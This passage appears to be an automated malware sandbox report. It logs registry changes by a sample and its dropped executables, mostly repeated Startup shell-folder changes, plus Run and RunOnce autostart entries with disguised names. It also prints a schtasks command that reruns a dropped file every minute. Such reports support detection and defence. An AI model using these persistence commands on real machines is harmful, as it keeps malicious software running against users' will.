                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exeJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exeJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exeJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explert.exeJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvcJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvcJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdaterJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdaterJump to behavior
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
